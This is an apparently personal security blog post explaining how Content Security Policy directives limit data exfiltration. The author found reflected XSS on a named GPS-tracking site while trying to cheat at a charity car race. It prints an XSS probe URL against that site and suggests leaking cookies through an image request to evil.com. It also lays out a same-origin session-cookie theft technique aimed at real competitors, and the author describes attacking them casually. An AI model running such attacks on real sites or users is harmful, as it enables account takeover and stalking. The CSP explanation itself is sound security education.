So a friend of mine was competing in WhiteHatRally last year, which is a sort of “solve the clues to figure out where to go”-style car race for charity, and he realised that it might be possible to stalk the other competitors, who were displaying there progress on FB via GPS tracking site insta-mapper.com, in order to determine where they were going and beat them there. So initially we looked at spending a weekend making an app to cheat at a charity race by scraping the other contestant’s locations in semi-real-time… we’re that cool. But I ended up spending the weekend learning the ins and outs of Content Security Policy (CSP) instead, which actually is quite cool.
In failing to make an app to cheat at a charity race I noticed that the site had pretty dyer input validation and pretty much everything was vulnerable to XSS. This was a prime example:
http://www.insta-mapper.com/google_map.php?device_id=1234‘;alert();
We realised that an even more effective form of cheating would be to compromise the insta-mapper accounts of the other contestants using this XSS, and get a better look at where they were and where they were going.. and so we went from making an app to cheat at a charity race to directly attacking its competitors :/ Its weird how comfortable I was with this.
BUT HOLLLLLLD YOUR HORSES YOUNG PADAWAN! What’s this?
The site had “connect-src” & “form-action” directives in the CSP headers, with values pointing to the site’s own origin. What on earth do they mean? I thought CSP was for blocking XSS?! Well… take a look at these:

  • "connect-src" limits the origins to which you can connect (via XHR, WebSockets, and EventSource).
  • "form-action" lists valid endpoints for submission from <form> tags.
  • "child-src" lists the URLs for workers and embedded frame contents. For example: child-src https://youtube.com would enable embedding videos from YouTube but not from other origins.
  • "img-src" defines the origins from which images can be loaded.
  • "media-src" restricts the origins allowed to deliver video and audio.
  • "font-src" specifies the origins that can serve web fonts.

http://www.html5rocks.com/en/tutorials/security/content-security-policy/
So utilising ALL of these directives, a site can, quite effectively, prevent itself from being used as a base for CSRF against another site, and can prevent data exfiltration from its own pages. Cool!
Now, the insta-mapper app only uses two of these directives, and the others give us clues as to how we might still be able to get data out. We could, for example, inject an image whose location is at evil.com and the file-name is the victim’s session cookie, then simply scrape that from our access logs. But, as a thought experiment, lets assume that insta-mapper used ALL of these directives… then what?
This would mean that, while we have XSS which can grab the session cookies, we can’t actually ex-filtrate them out of the application to evil.com, drats! Although, and this is the semi-obvious, yet not so obvious, bit… we don’t hardly ever need to get data OUT of an application, we just have to COPY it somewhere we can see it. With that in mind, this is what the URL above does:
Makes and AJAX post to the registration page for insta-mapper.com (same origin, totally allowed), creating a new account with a User/pass that we define.. and registers a tracking device for that account with the name of document.cookie.
BOOM! All we have to do is send a victim (aka; a nice person who has spent their weekend doing something good for charity) this link, log-in to the account we made them set-up, and look at the account’s device name, which will be the session cookie for the victim!
-hiburn8
as a side: If the site you’re pwning uses JQuery or you’re able to bring it in yourself, do yourself a favour and do it. The AJAX functions will make your payloads/attacks smaller and work better across different browsers, rather than including a mess of 10-year-old JS you copied from the web. Its just as reliable as injecting an auto-submitting form these days and wont redirect the browser 🙂
Update: I sent Google’s Mike West my thanks for his CSP write-up on HTML5rocks.com and pointed him to my post. He directed me to a blog/paper Michal Zalewski (@lcamtuf) published back in December of 2011, which talks about the many ways in which an attacker can perform content exfiltration. It looks like, at the time, CSP was really only an XSS defence.. but has since grown to include all of the above directives which, one-by-one, work to solve the data egress methods Michal talks about. We both came to the same conclusion in our posts though, that same-origin content exfiltration is going to be damn-near impossible to protect against.  I’d thoroughly recommend reading his paper: http://lcamtuf.coredump.cx/postxss.